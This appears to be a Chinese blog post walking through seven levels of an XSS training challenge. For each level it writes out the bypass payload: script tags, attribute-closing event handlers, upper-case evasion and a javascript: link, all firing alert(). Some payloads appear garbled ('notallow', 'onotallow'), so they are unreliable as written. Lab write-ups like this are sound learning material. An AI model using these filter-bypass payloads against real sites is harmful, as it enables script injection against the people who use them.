0
点赞
收藏
分享

微信扫一扫

XSS闯关记录


文章目录

  • ​​第一关​​
  • ​​第二关--闭合​​
  • ​​第三关​​
  • ​​第四关太简单了​​
  • ​​第五关--过滤了on关键字​​
  • ​​第六关--大小写绕过懒的截图​​
  • ​​第七关--补充撮合​​

第一关

XSS闯关记录_大小写


没有任何的过滤,直接得到​​name=<script>alert()</script>​

XSS闯关记录_javascript_02

第二关–闭合

发现是在Value里面很简单闭合前面和后面即可,我的一种方案是

​"onload="alert();""​

XSS闯关记录_a标签_03

第三关

XSS闯关记录_javascript_04


发现没啥用处,最后尝试出​​'notallow="alert(1)​

第四关太简单了

XSS闯关记录_大小写_05

​" onfocus="alert(/xss/)​

第五关–过滤了on关键字

考虑用a标签,​​<a href="javascript:alert()">666</a>​

XSS闯关记录_javascript_06

第六关–大小写绕过懒的截图

" ONmouseover="alert(/xss/)

第七关–补充撮合

XSS闯关记录_javascript_07


​" onotallow="alert()​


举报

相关推荐

0 条评论